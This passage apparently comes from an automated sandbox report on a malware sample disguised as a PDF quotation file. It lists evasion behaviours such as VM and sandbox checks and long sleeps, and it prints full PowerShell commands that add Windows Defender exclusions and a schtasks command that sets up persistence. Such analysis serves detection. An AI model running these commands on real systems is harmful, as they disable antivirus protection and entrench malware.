                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: UN-Quotation 70000000187366444_PDF.exe PID: 6220, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe TID: 6248Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6920Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6764Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6848Thread sleep count: 7498 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6928Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6852Thread sleep count: 815 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe TID: 4760Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe TID: 4800Thread sleep count: 3332 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe TID: 4800Thread sleep count: 5748 > 30Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5087Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 661Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7498Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 815Jump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeWindow / User API: threadDelayed 3332Jump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeWindow / User API: threadDelayed 5748Jump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.304363401.0000000006CF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: eZUFMybyZvmCI51dXuO
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_06498F98 LdrInitializeThunk,10_2_06498F98
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exe
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exeJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exeJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XrgnLg" /XML "C:\Users\user\AppData\Local\Temp\tmp25F3.tmpJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
